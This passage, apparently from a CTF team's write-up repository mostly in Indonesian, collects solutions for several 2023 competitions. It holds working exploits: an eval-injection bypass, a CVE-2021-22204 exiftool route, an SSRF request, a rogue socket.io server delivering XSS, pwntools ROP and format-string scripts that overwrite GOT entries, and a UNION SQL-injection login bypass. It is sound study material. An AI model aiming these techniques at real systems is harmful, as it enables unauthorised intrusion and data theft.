50 | if ($pw =~ /AUTOLOAD|BEGIN|CHECK|DESTROY|END|INIT|UNITCHECK|abs|accept|alarm|atan2|bind|binmode|bless|break|caller|chdir|chmod|chomp|chop|chown|chr|chroot|close|closedir|connect|cos|crypt|dbmclose|dbmopen|defined|delete|die|dump|each|endgrent|endhostent|endnetent|endprotoent|endpwent|endservent|eof|eval|exec|exists|exit|fcntl|fileno|flock|fork|format|formline|getc|getgrent|getgrgid|getgrnam|gethostbyaddr|gethostbyname|gethostent|getlogin|getnetbyaddr|getnetbyname|getnetent|getpeername|getpgrp|getppid|getpriority|getprotobyname|getprotobynumber|getprotoent|getpwent|getpwnam|getpwuid|getservbyname|getservbyport|getservent|getsockname|getsockopt|glob|gmtime|goto|grep|hex|index|int|ioctl|join|keys|kill|last|lc|lcfirst|length|link|listen|local|localtime|log|lstat|map|mkdir|msgctl|msgget|msgrcv|msgsnd|my|next|not|oct|open|opendir|ord|our|pack|pipe|pop|pos|print|printf|prototype|push|quotemeta|rand|read|readdir|readline|readlink|readpipe|recv|redo|ref|rename|require|reset|return|reverse|rewinddir|rindex|rmdir|say|scalar|seek|seekdir|select|semctl|semget|semop|send|setgrent|sethostent|setnetent|setpgrp|setpriority|setprotoent|setpwent|setservent|setsockopt|shift|shmctl|shmget|shmread|shmwrite|shutdown|sin|sleep|socket|socketpair|sort|splice|split|sprintf|sqrt|srand|stat|state|study|substr|symlink|syscall|sysopen|sysread|sysseek|system|syswrite|tell|telldir|tie|tied|time|times|truncate|uc|ucfirst|umask|undef|unlink|unpack|unshift|untie|use|utime|values|vec|wait|waitpid|wantarray|warn|write/) {
51 | print "I know eval injection :(";
52 | die();
53 | }
54 | if ($pw =~ /[Mx. squ1ffy]/i) {
55 | print "You may have had one too many Old Pal :(";
56 | die();
57 | }
58 |
59 |
60 | if (eval("$pw == 20230325")) {
61 | print "Congrats! Flag is LINECTF{redacted}"
62 | } else {
63 | print "wrong password :(";
64 | die();
65 | };
66 | ```
67 |
68 | Untuk membypass semua itu kita bisa menggunakan payload berikut.
69 |
70 | ```
71 | 20230325-v48
72 | ```
73 |
74 | Dimana v48 equal denga '0' sehinggal nanti menghasilkan `20230325` yang merupakan password yang harus kita inputkan.
75 |
76 | # Imagexif - web
77 | ## Description
78 | This site provides you with the information of the image(EXIF) file. But there is a dangerous vulnerability here. I hope you get the data you want with the various functions of the system and your imagination.
79 |
80 | ## exploit
81 | Pada challenge ini kita akan meng-eksploitasi [CVE-2021-22204](https://github.com/bilkoh/POC-CVE-2021-22204/blob/main/build_image.pl).
82 |
83 | Saat kita melihat dockerfile pada backend kita akan menemukan bahwa mesin tersebut menggunakan versi exiftool yang vulnerable.
84 |
85 | ```dockerfile
86 | RUN wget https://github.com/exiftool/exiftool/archive/refs/tags/12.22.tar.gz && \
87 | tar xvf 12.22.tar.gz && \
88 | cp -fr /exiftool-12.22/* /usr/bin && \
89 | rm -rf /exiftool-12.22 && \
90 | rm 12.22.tar.gz
91 | ```
92 |
93 | Kita akan menggunakan POC berikut untuk mendapatkan flagnya https://github.com/bilkoh/POC-CVE-2021-22204/blob/main/build_image.pl.
94 |
95 | 
96 |
97 | Jalankan perintah diatas dan nanti akan muncul image `notevil.jpg`, kita kirim image tersebut ke server dan kita akan mendapatkan flagnya.
98 |
99 | 
100 |
101 | # Adult Simple GoCurl - web
102 | Pada challenge ini kita perlu membuat request ke `/flag`, disini kita bisa memanfaatkan fitur pada module gin golang yaitu `X-Forwarded-Prefix` untuk lebih jelasnya bisa dilihat disini https://github.com/gin-gonic/gin/pull/1238/commits/0906ea946d9f39dc5b8e9b4832d1eb9eaa8ca35f.
103 |
104 | Fitur ini berfungsi untuk mengubah redirect dari golang dengan mendambahkan value yang kita berikan tadi ke header `Location`.
105 |
106 | Berikut request yang saya gunakan untuk menyelesaikan challenge ini.
107 |
108 | ```http
109 | GET /curl/?url=http://127.0.0.1:8080//&header_key=X-Forwarded-Prefix&header_value=/flag HTTP/1.1
110 | Host: 34.84.87.77:11001
111 | Connection: close
112 | ```
113 |
114 | 
115 |
116 | # Our Team Writeup
117 | @daffainfo
118 |
119 | https://github.com/daffainfo/ctf-writeup/tree/main/LINE%20CTF%202023
120 | | Category | Challenge |
121 | | --- | --- |
122 | | Web | Baby Simple GoCurl
123 |
124 | @kaelanalysis
125 |
126 | - https://github.com/maulvialf/CTF-Writeups/tree/main/2023/linectf
127 | - https://maulvialf.medium.com/write-up-reverse-engingeering-line-ctf-2023-fishing-and-jumpit-18d5a6c3092e
128 |
129 | - rev
130 | 1. fishing
131 | 2. jumpit
--------------------------------------------------------------------------------
/2023/Real-World-CTF/Pasted image 20230109172555.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Real-World-CTF/Pasted image 20230109172555.png
--------------------------------------------------------------------------------
/2023/Real-World-CTF/README.md:
--------------------------------------------------------------------------------
1 | # web
2 | ---
3 | ## ChatUwU
4 | Kita diberikan attachment yang berupa aplikasi yang menggunakan nodejs dengan dependency express dan juga socket io.
5 |
6 | Langsung masuk ke intinya.
7 | Vulnerability pada web app tersebut berada di client side pada kode berikut
8 | `index.html`
9 | ```js
10 | document.title += ' - ' + room;
11 | let socket = io(`/${location.search}`), # <- vulnerable code
12 | messages = document.getElementById('messages'),
13 | form = document.getElementById('form'),
14 | input = document.getElementById('input');
15 | ```
16 |
17 | socket io mengambil parameter location.search sebagai inputnya. Kita bisa memanipulasi location.search dengan menambahkan foo@attacker.com di salah satu parameter url misalnya
18 | http://localhost:58000/?nickname=x@localhost:8000/?nickname=x&room=DOMPurify
19 |
20 | Dengan cara ini kita dapat mengubah poin akses socket io ke web socket yang kita buat sendiri sehingga kita dapat mengirimkan malcious data yang berisi payload untuk mendapatkan xss di client.
21 |
22 | Berikut code yang saya gunakan untuk membuat attacker server:
23 |
24 | ```js
25 | const http = require("http").Server();
26 | const { Server } = require("socket.io");
27 |
28 | const io = new Server(http, {
29 | cors: {
30 | origin: "http://localhost:58000",
31 | },
32 | });
33 |
34 | const hostname = "0.0.0.0";
35 | const port = 8000;
36 |
37 | let payload = btoa(`
38 | // xss payload here
39 | alert(1)
40 | `)
41 | payload = `
42 |
43 | `;
44 |
45 | io.on("connection", (socket) => {
46 | let { room } = socket.handshake.query;
47 | console.log(socket.handshake.query);
48 |
49 | socket.join(room);
50 | io.to(room).emit("msg", {
51 | from: "attacker",
52 | text: payload,
53 | isHtml: true,
54 | });
55 | });
56 |
57 | http.listen(port, hostname, () => {
58 | console.log(`ChatUWU server running at http://${hostname}:${port}/`);
59 | });
60 | ```
61 |
62 | 
--------------------------------------------------------------------------------
/2023/San-diego-ctf-2023/README.md:
--------------------------------------------------------------------------------
1 | ---
2 | Archive: "https://drive.google.com/drive/folders/1xx240hie7UY9wiJSIHbDgwPoQdgIq3Uq?usp=sharing"
3 | ---
4 |
5 | # tROPic-thunder - PWN
6 |
7 | ```python
8 | #!/usr/bin/env python3
9 | # -*- coding: utf-8 -*-
10 | # This exploit template was generated via:
11 | # $ pwn template --host thunder.sdc.tf --port 1337 ./tROPic-thunder
12 | from pwn import *
13 |
14 | # Set up pwntools for the correct architecture
15 | exe = context.binary = ELF('./tROPic-thunder')
16 |
17 | # Many built-in settings can be controlled on the command-line and show up
18 | # in "args". For example, to dump all data sent/received, and disable ASLR
19 | # for all created processes...
20 | # ./exploit.py DEBUG NOASLR
21 | # ./exploit.py GDB HOST=example.com PORT=4141
22 | host = args.HOST or 'thunder.sdc.tf'
23 | port = int(args.PORT or 1337)
24 |
25 | def start_local(argv=[], *a, **kw):
26 | '''Execute the target binary locally'''
27 | if args.GDB:
28 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
29 | else:
30 | return process([exe.path] + argv, *a, **kw)
31 |
32 | def start_remote(argv=[], *a, **kw):
33 | '''Connect to the process on the remote host'''
34 | io = connect(host, port)
35 | if args.GDB:
36 | gdb.attach(io, gdbscript=gdbscript)
37 | return io
38 |
39 | def start(argv=[], *a, **kw):
40 | '''Start the exploit against the target.'''
41 | if args.LOCAL:
42 | return start_local(argv, *a, **kw)
43 | else:
44 | return start_remote(argv, *a, **kw)
45 |
46 | # Specify your GDB script here for debugging
47 | # GDB will be launched if the exploit is run via e.g.
48 | # ./exploit.py GDB
49 | gdbscript = '''
50 | tbreak main
51 | continue
52 | '''.format(**locals())
53 |
54 | #===========================================================
55 | # EXPLOIT GOES HERE
56 | #===========================================================
57 | # Arch: amd64-64-little
58 | # RELRO: Partial RELRO
59 | # Stack: Canary found
60 | # NX: NX enabled
61 | # PIE: No PIE (0x400000)
62 |
63 | io = start()
64 |
65 | bss = exe.bss()+0x200
66 | rop = ROP(exe)
67 |
68 | p = 'a'*(112+8)
69 |
70 | rop.read(0,bss,0x40)
71 | rop.open(bss,0,0)
72 | rop.read(3,bss+0x100,0x100)
73 | rop.write(1,bss+0x100,0x100)
74 | p += rop.chain()
75 | print(rop.dump())
76 |
77 | io.sendlineafter("one!\n",p)
78 |
79 | io.send("./flag.txt")
80 |
81 | io.interactive()
82 | ```
83 |
84 | # money-printer - PWN
85 |
86 | ```python
87 | #!user/bin/python3
88 | from pwn import *
89 |
90 | # =========================================================
91 | # SETUP
92 | # =========================================================
93 | exe = './money-printer'
94 | elf = context.binary = ELF(exe, checksec=True)
95 | context.log_level = 'warn'
96 |
97 | # =========================================================
98 | # EXPLOITS
99 | # =========================================================
100 |
101 | flag = ""
102 |
103 | for i in range(10, 16):
104 | try:
105 | # io = process(exe)
106 | io = remote('money.sdc.tf', 1337)
107 | # overwriting dollar variable
108 | io.sendlineafter(b'how many of them do you want?', b'-1')
109 | # format string vuln
110 | io.sendlineafter(b'to the audience?', f'%{i}$p'.encode())
111 | io.recvuntil(b'\n')
112 | leak = io.recvline()
113 | if not b'nil' in leak:
114 | print(f'stack at {i} :' + str(leak))
115 | try:
116 | hexform = unhex(leak.split()[3][2:].decode())
117 | flag += hexform.decode()[::-1]
118 | print('flag appended')
119 | except BaseException:
120 | pass
121 | io.close()
122 | except EOFError or UnicodeDecodeError:
123 | pass
124 |
125 | print(f'{flag=}')
126 | ```
127 |
128 | # money printer2 - pwn
129 |
130 | ```python
131 | def exploit():
132 | io = start()
133 |
134 | # Step 1
135 | p ='-2147483647'
136 | io.sendline(p)
137 |
138 | p = '%p%c'+'%c'*(25-4) + '%{}c%hn'.format(0xdec8-0x24)
139 | p += '%{}c%51$hn'.format((0x10000 - 0xdec8) + 0x07e8) # dec8 d948
140 | io.sendlineafter('ence?\n',p)
141 |
142 | io.recvuntil('said: ')
143 | stack = int(io.recv(14),16)
144 | stack_canary = stack + 0x2698
145 | # print "Leak stack canary : " + str(hex(stack_canary))
146 | print "Leak return stack : " + str(hex(stack_canary))
147 |
148 | # Step 2
149 | p ='-2147483647'
150 | io.sendline(p)
151 |
152 | # 0x00000000004007e7 <+0>: push rbp
153 | # 0x00000000004007e8 <+1>: mov rbp,rsp
154 |
155 | writes = {0x601020 : 0x4007e7, # GOT _stack_chk_fail -> main 0x00000000004007e8
156 | stack_canary : 0x0f}
157 | p = fmtstr_payload(8, writes, numbwritten=0)
158 | print(len(p))
159 | io.sendlineafter('ence?\n',p)
160 | print('pass step 2')
161 |
162 | # Step 3
163 | p ='-2147483647'
164 | io.sendline(p)
165 |
166 | writes = {
167 | exe.got['printf'] : exe.plt['system'], # GOT printf -> main system
168 | stack_canary-0x80-0x10 : 0x0f
169 | }
170 | p = fmtstr_payload(8, writes, numbwritten=0)
171 | io.sendlineafter('ence?\n',p)
172 | print('pass step 3')
173 |
174 | # Step 4
175 | p ='-2147483647'
176 | io.sendline(p)
177 | p ='cat flag*'
178 | io.sendline(p)
179 |
180 | io.interactive()
181 |
182 | # exploit()
183 | for i in range(1000):
184 | try:
185 | exploit()
186 | except Exception as e:
187 | pass
188 | ```
--------------------------------------------------------------------------------
/2023/VU-Cyberthon-2023/README.md:
--------------------------------------------------------------------------------
1 | ## Weak Password
2 | Pada challenge ini kita diberikan zip yang ter lock. Untuk unlocknya kita perlu menggunakan john the ripper.
3 |
4 | Pertama kita rubah dari zip ke format john
5 | ```sh
6 | zip2john taskweakpassword.zip > hash.txt
7 | ```
8 |
9 | Setelah itu kita crack menggunakan wordlist seclist
10 | ```sh
11 | john -w=/usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-1000000.txt hash.txt
12 | ```
13 |
14 | Bisa kita cek hasilnya menggunakan
15 | ```sh
16 | john --show hash.txt
17 | ```
18 |
19 | output
20 | ```
21 | taskweakpassword.zip/taskweakpassword/about.txt:Kaunas:taskweakpassword/about.txt:taskweakpassword.zip::taskweakpassword.zip
22 |
23 | 1 password hash cracked, 0 left
24 | ```
25 | Setelah itu kita perlu meng-wrap password itu denga VU{.*}
26 | Flag: VU{Kaunas}
27 |
28 | ## Eksternal writeup from our team
29 | ### Daffainfo
30 | https://github.com/daffainfo/ctf-writeup/tree/main/VU%20CYBERTHON%202023
31 |
32 | | Category | Challenge
33 | | --- | --- |
34 | | Cryptography, Web Exploitation | [Simple Web](/VU%20CYBERTHON%202023/Simple%20Web/)
35 | | Cryptography, Web Exploitation | [Docker Web](/VU%20CYBERTHON%202023/Docker%20Web/)
36 | | Network Security | [Blue Baby Shark](/VU%20CYBERTHON%202023/Blue%20Baby%20Shark/)
37 | | OSINT | [RFC standard for security policy information](/VU%20CYBERTHON%202023/RFC%20standard%20for%20security%20policy%20information/)
38 | | OSINT | [Find location](/VU%20CYBERTHON%202023/Find%20location/)
39 | | Digital Forensics | [What is SHA1 checksum of image file blk0_mmcblk0.bin ?](/VU%20CYBERTHON%202023/What%20is%20SHA1%20checksum%20of%20image%20file%20blk0_mmcblk0.bin/)
40 | | Digital Forensics | [What is the name of the largest partition?](/VU%20CYBERTHON%202023/What%20is%20the%20name%20of%20the%20largest%20partition/)
41 | | Digital Forensics | [What email address is setup on com.android.email service?](/VU%20CYBERTHON%202023/What%20email%20address%20is%20setup%20on%20com.android.email%20service/)
42 | | Digital Forensics | [What is the brand (vendor) of phone?](/VU%20CYBERTHON%202023/What%20is%20the%20brand%20(vendor)%20of%20phone/)
43 | | Digital Forensics | [Find ICCID Number](/VU%20CYBERTHON%202023/Find%20ICCID%20Number/)
44 | | Digital Forensics | [Find MSISDN Number](/VU%20CYBERTHON%202023/Find%20MSISDN%20Number/)
45 | | Digital Forensics | [What is the name of the username telegram?](/VU%20CYBERTHON%202023/What%20is%20the%20name%20of%20the%20username%20telegram/)
46 | | Digital Forensics | [What is the model of the phone?](/VU%20CYBERTHON%202023/What%20is%20the%20model%20of%20the%20phone/)
47 | | Digital Forensics | [What is the name of WhatsApp user which has phone number +37062166565?](/VU%20CYBERTHON%202023/What%20is%20the%20name%20of%20WhatsApp%20user%20which%20has%20phone%20number%20%2B37062166565/)
48 | | Digital Forensics | [How much dollars the seized weapons (stuff) may have cost?](/VU%20CYBERTHON%202023/How%20much%20dollars%20the%20seized%20weapons%20(stuff)%20may%20have%20cost/)
49 | | Digital Forensics | [What tank specs the user was looking for?](/VU%20CYBERTHON%202023/What%20tank%20specs%20the%20user%20was%20looking%20for/)
50 | | Digital Forensics | [What web address was provided for a company that can rent cargo planes?](/VU%20CYBERTHON%202023/What%20web%20address%20was%20provided%20for%20a%20company%20that%20can%20rent%20cargo%20planes/)
51 | | Digital Forensics | [What is a name of video file which is related with tanks?](/VU%20CYBERTHON%202023/What%20is%20a%20name%20of%20video%20file%20which%20is%20related%20with%20tanks/)
52 | | Digital Forensics | [Based on the analysis of the video file 20221015_173902.mp4, please provide the GPS coordinates of the possible place, where video was recorded?](/VU%20CYBERTHON%202023/Based%20on%20the%20analysis%20of%20the%20video%20file%2020221015_173902.mp4%2C%20please%20provide%20the%20GPS%20coordinates%20of%20the%20possible%20place%2C%20where%20video%20was%20recorded/)
53 | | Digital Forensics | [Based on the review of the media files, please provide the GPS coordinates of the possible meeting point.](/VU%20CYBERTHON%202023/Based%20on%20the%20review%20of%20the%20media%20files%2C%20please%20provide%20the%20GPS%20coordinates%20of%20the%20possible%20meeting%20point/)
54 |
55 |
--------------------------------------------------------------------------------
/2023/WaniCtf 2023/README.md:
--------------------------------------------------------------------------------
1 | ---
2 | Chall Archive: "https://drive.google.com/drive/folders/1pLS49uUfsT05XXTK7ZJRkHqWEhF2lW-_?usp=sharing"
3 | ---
4 |
5 | 
6 |
7 | Our Team Writeup
8 | ===
9 |
10 | ## dimas maulana
11 |
12 | WaniCTF 2023 Writeup.
13 |
14 | Web Challenges:
15 | - screenshot
16 | - certified 2
17 | - Lambda
18 |
19 | Misc Challenges:
20 | - machine_loading
21 |
22 | [https://hackmd.io/@Solderet/SomeWriteupForWaniCTF2023-XogSiA](https://hackmd.io/@Solderet/SomeWriteupForWaniCTF2023-XogSiA "https://hackmd.io/@Solderet/SomeWriteupForWaniCTF2023-XogSiA")
23 |
24 | # daffainfo
25 |
26 | Writeup WaniCTF 2023 (English)
27 |
28 | ```
29 | Category Challenge
30 | Crypto EZDORSA_Lv1
31 | Crypto EZDORSA_Lv2
32 | Crypto EZDORSA_Lv3
33 | Crypto pqqp
34 | Web Extract Service 1
35 | Reversing Just_Passw0rd
36 | Misc Guess
37 | Misc int_generator
38 | ```
39 |
40 | https://github.com/daffainfo/ctf-writeup/tree/main/WaniCTF%202023
41 |
42 |
--------------------------------------------------------------------------------
/2023/bbctf-2023/Pasted image 20230206061956.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/bbctf-2023/Pasted image 20230206061956.png
--------------------------------------------------------------------------------
/2023/bbctf-2023/Pasted image 20230206062058.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/bbctf-2023/Pasted image 20230206062058.png
--------------------------------------------------------------------------------
/2023/bbctf-2023/Pasted image 20230206062127.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/bbctf-2023/Pasted image 20230206062127.png
--------------------------------------------------------------------------------
/2023/bbctf-2023/Pasted image 20230206062218.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/bbctf-2023/Pasted image 20230206062218.png
--------------------------------------------------------------------------------
/2023/ctf-after-dark-winter-2023/README.md:
--------------------------------------------------------------------------------
1 | # Spiteful XSS - Web
2 | ## Description
3 | Everyone keeps exploiting my site, so I deleted all the globals.
4 |
5 | ## Solve
6 | Pada challenge ini kita akan diberikan website sebagai berikut.
7 | https://spiteful-xss.acmcyber.com/
8 |
9 | 
10 |
11 | Website ini vulnerable dengan XSS, tetapi hampir semua builtins function tidak ada yang bisa dipakai.
12 |
13 | Saat kita melihat dibagian atas html kita akan melihat script dibawah ini, yang dimana script ini menghapus semua global variable, sehingga kita tidak bisa melakukan XSS.
14 |
15 | ```html
16 |
21 | ```
22 |
23 | Bagaimana cara membypassnya.
24 |
25 | Disini kita bisa menggunakan `iframe`, iframe akan membuat DOM baru dimana disitu kita bisa menggunakan fungsi fungsi builtins yang ada.
26 |
27 | Payload XSS:
28 | ```html
29 |
34 | ```
35 |
36 | 
37 |
38 |
39 | Get flag:
40 | ```html
41 |
46 | ```
47 |
48 | 
49 |
50 | # Injection Perfection - Web
51 | ## Description
52 | After port scanning the acmcyber site, I found this hidden login page. After bruteforcing I discovered the user: joe, has the password: bruin, but I didn't find anything useful. Can you log in as admin?
53 |
54 | ## Solve
55 | Pada source code kita akan melihat endpoint yang vulnerable dengan SQL Injection.
56 |
57 | ```node
58 | const attemptLogin = (username, password) => {
59 | return new Promise((resolve, reject) => {
60 | db.get(`SELECT username, password FROM users WHERE username='${username}'`, async (err, row) => {
61 | if (err)
62 | return reject(err);
63 | else if (row === undefined)
64 | return reject('Invalid User');
65 | else if (password === row.password)
66 | return resolve(`My favorite color is ${await getFavColor(row.username)}`);
67 | else
68 | return reject('incorrect password');
69 | });
70 | })
71 | };
72 | ...snip..
73 | app.post('/', async (req, res) => {
74 | const username = req.body.username;
75 | const password = req.body.password;
76 |
77 | if (!username || !password)
78 | return res.status(400).send("Invalid Login");
79 |
80 | try {
81 | return res.status(200).send(await attemptLogin(username, password));
82 | } catch (err) {
83 | return res.status(400).send(err);
84 | }
85 | });
86 | ```
87 |
88 | Pada endpoint tersebut kita bisa mengirimkan post request yang berisi UNION based SQLI seperti berikut untuk membypass authentifikasi.
89 |
90 | ```
91 | username='UNION/**/SELECT/**/"admin",'asd&password=asd
92 | ```
93 |
94 | Setelah itu kita akan mendapatkan flagnya di response content.
95 |
96 | # Jester - web
97 |
98 | ```python
99 | from requests import *
100 | import re
101 | import math
102 |
103 | url = "https://jester.acmcyber.com/"
104 |
105 | # biar tak terjebak karna cookies pas request
106 | session = Session()
107 | r = session.get(url)
108 | cok = session.cookies.get_dict()
109 |
110 | # Ronde 1 = Pertambahan
111 | x1 = re.findall("What is (.*) \?<\/p>", r.content.decode('utf-8'))
112 | data = eval(x1[0])
113 |
114 | ans = {'answer': data}
115 | print('r1 =', ans)
116 |
117 | r1 = session.post(url=url+'validate', data=ans)
118 |
119 | # Ronde 2 = Quadratic Equation
120 | x2 = re.findall("What are the roots of (.*) \?<\/p>", r1.content.decode())
121 |
122 | quadratic = re.findall(r'\d+', x2[0])
123 | coefficients = [int(coefficient) for coefficient in quadratic]
124 | coefficients.pop(1)
125 |
126 | x = coefficients[0]
127 | y = coefficients[1]
128 | z = coefficients[2]
129 |
130 | cal = (y**2) - (4*x*z)
131 |
132 | sol1 = (-y - math.sqrt(cal)) / (2*x)
133 | sol2 = (-y + math.sqrt(cal)) / (2*x)
134 |
135 | rd1 = round(sol1)
136 | rd2 = round(sol2)
137 |
138 | ans2 = {'answer1': rd1, 'answer2': rd2}
139 | print('r2 =',ans2)
140 |
141 | r2 = session.post(url=url+'validate', data=ans2)
142 | print(r2.content)
143 | ```
144 |
145 | # Our Team Writeup
146 |
147 | Daffainfo: https://github.com/daffainfo/ctf-writeup/tree/main/CTF%20After%20Dark%20-%20Winter%202023
148 |
149 | | Category | Challenge
150 | | --- | --- |
151 | | Intro | Cookies
152 | | Intro | Secure Platform
153 | | Intro | Bagels
154 | | SQLi | Bank
155 | | SQLi | SQL Prevention-101
156 | | LFI | Star Poet Blog
157 |
158 | RisyadAR: https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/
159 |
160 | - Website
161 | - [Birthday](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/Birthday/)
162 | - [Mean Girls](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/Mean%20Girls/)
163 | - [What's on the Menu?](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/What's%20on%20the%20Menu%3F/)
164 | - [Simple Calculator](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/Simple%20Calculator/)
165 | - [No Fetch?!?!](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/No%20Fetch%3F!%3F!/)
166 |
167 | # etc
168 |
169 | CTF source code: https://github.com/uclaacm/ctf-after-dark-w23
--------------------------------------------------------------------------------
/2023/damctf-2023/README.md:
--------------------------------------------------------------------------------
1 | # tcl-tac-toe - web
2 | ## Description
3 | Time to tackle tcl-tac-toe: the tricky trek towards top-tier triumph
4 |
5 | http://tcl-tac-toe.chals.damctf.xyz/
6 |
7 | http://161.35.58.232/
8 |
9 | ## Exploit
10 | An attachment is provided for this challenge, which reveals the use of an uncommon programming language, namely [tcl](https://wapp.tcl-lang.org/).
11 |
12 | 
13 |
14 | Upon accessing the challenge's website, it becomes apparent that the site is hosting a game of tic-tac-toe, as depicted in the image below.
15 |
16 | 
17 |
18 | The tic-tac-toe game happens to be impossible to solve because the bot cheats by taking two steps before it can lose.
19 |
20 | We will use Burp Suite to intercept what happens in the background. As shown in the image below, the bot uses a type of Message Authentication Token to verify whether the input has been tampered with or not.
21 |
22 | 
23 |
24 | Tampering with the request will result in a response that looks like this:
25 |
26 | 
27 |
28 | Is it possible to bypass this and obtain the flag? It appears that we can still play the game even if we have already lost, because the function check_win in the source code does not prevent this type of undefined behavior from occurring.
29 |
30 | ```tcl
31 | proc check_win {board} {
32 | set win {{1 2 3} {4 5 6} {7 8 9} {1 4 7} {2 5 8} {3 6 9} {1 5 9} {3 5 7}}
33 | foreach combo $win {
34 | foreach player {X O} {
35 | set count 0
36 | set index [lindex combo 0]
37 | foreach cell $combo {
38 | if {[lindex $board [expr {$cell - 1}]] != $player} {
39 | break
40 | }
41 | incr count
42 | }
43 | if {$count == 3} {
44 | return $player
45 | }
46 | }
47 | }
48 | # check if it's a tie
49 | if {[string first {-} $board] == -1} {
50 | return {tie}
51 | }
52 | return {-}
53 | }
54 | ```
55 |
56 | We will now open the developer console and set a breakpoint on the if statement just before `location.reload` is invoked.
57 |
58 | 
59 |
60 | Keep playing the game until the alert pops up, click ok.
61 |
62 | 
63 |
64 | Once we hit the breakpoint, modify the value of message to a random value.
65 |
66 | 
67 |
68 | After making the modification, win the game.
69 |
70 | 
71 |
72 | After winning the game, the flag should be obtained.
73 |
74 | 
75 |
76 | # Url-Stored-Notes - damctf - web
77 | Pada challenge ini kita akan diberikan source yang bisa di cek di google drive berikut https://drive.google.com/drive/folders/18HfXS1sXOB1OB14aPjyu2flsksibD4rs .
78 |
79 | Pada source code kita bisa menambahkan arbitary tag ke dalam html kecual `script` tag. Karna pada website tersebut menggunakan sebuah ekstensi py-script, jadi kita bisa menggunakan itu untuk mendapatkan XSS.
80 |
81 | Pada website kita akan menemukan halaman website seperti ini untuk membuat tagnya, dan ketika kita memencet share, akan muncul link seperti gambar dibawah ini.
82 |
83 | 
84 |
85 | Disini kita bisa memanipulasi url tersebut menggunakan script berikut
86 |
87 | ```python
88 | from base64 import b64encode
89 | from lzma import compress, decompress
90 | import json
91 | from urllib.parse import quote_plus
92 |
93 | def encodeNotes(prompt, answer, tag):
94 | return b64encode(compress(json.dumps([{
95 | "prompt": prompt,
96 | "answer": answer,
97 | "tag": tag,
98 | }]).encode()))
99 |
100 | a = encodeNotes("""js.eval('alert(1)')""", "#foo>", "py-script").decode()
101 | a = "http://localhost:8080/#"+a
102 | print(a)
103 | ```
104 |
105 | 
106 |
107 | # Ctf challenges git
108 | [https://gitlab.com/osusec/damctf-2023-challenges/](https://gitlab.com/osusec/damctf-2023-challenges/ "https://gitlab.com/osusec/damctf-2023-challenges/")
109 |
110 | # Chall Archive:
111 |
112 | [https://drive.google.com/drive/folders/16GdzGztpCepHJWzxZYmO4dfATQhE6ibR?usp=sharing](https://drive.google.com/drive/folders/16GdzGztpCepHJWzxZYmO4dfATQhE6ibR?usp=sharing "https://drive.google.com/drive/folders/16GdzGztpCepHJWzxZYmO4dfATQhE6ibR?usp=sharing")
--------------------------------------------------------------------------------
/2023/deadsec-ctf-2023/README.md:
--------------------------------------------------------------------------------
1 | ---
2 | archive: https://drive.google.com/drive/folders/11CKmFHEW63B62bUw9HlFv-7W4nZPrnin?usp=share_link
3 | ---
4 |
5 | ## Our Team Member Writeup
6 |
7 | - https://github.com/daffainfo/ctf-writeup/tree/main/DeadSec%20CTF%202023
8 | ```
9 | Web FRSS
10 | Web Bing
11 | Web XEE1
12 | ```
13 |
14 | - https://hyggehalcyon.gitbook.io/page/ctfs/2023/deadsec-ctf-2023
15 | ```
16 | pwn-one-punch
17 | ```
18 |
--------------------------------------------------------------------------------
/2023/gray-cat-the-flag-2023-qualifier/README.md:
--------------------------------------------------------------------------------
1 | ---
2 | archive: https://drive.google.com/drive/folders/15jPr0S6WbEteq0pJLvR1YKjWzDum79CQ?usp=sharing
3 | archive: https://github.com/NUSGreyhats/greyctf23-challs-public
4 | ---
--------------------------------------------------------------------------------
/2023/m0leConCTF-2023/README.md:
--------------------------------------------------------------------------------
1 | ## Our Team Writeup
2 | - @dimasma0305 web-goldinopizza2: https://hackmd.io/@Solderet/m0leCon-ctf-exploiting-race-condition-goldinopizza2
--------------------------------------------------------------------------------
/2023/plaidCTF 2023/README.md:
--------------------------------------------------------------------------------
1 | Our Team Writeup
2 | ===
3 |
4 | @Maulvi Alfansuri
5 | - https://maulvialf.medium.com/write-up-reversing-plaid-ctf-2023-2e3ba1e3d539
6 |
7 | · Treasure
8 | · CSS
9 | · Epilogue
--------------------------------------------------------------------------------
/2023/wolvctf-2023/Pasted image 20230323041112.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/wolvctf-2023/Pasted image 20230323041112.png
--------------------------------------------------------------------------------
/2023/wolvctf-2023/Pasted image 20230323041128.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/wolvctf-2023/Pasted image 20230323041128.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # TCP1P CTF Writeup
2 | Writeup from TCP1P CTF comunity.
--------------------------------------------------------------------------------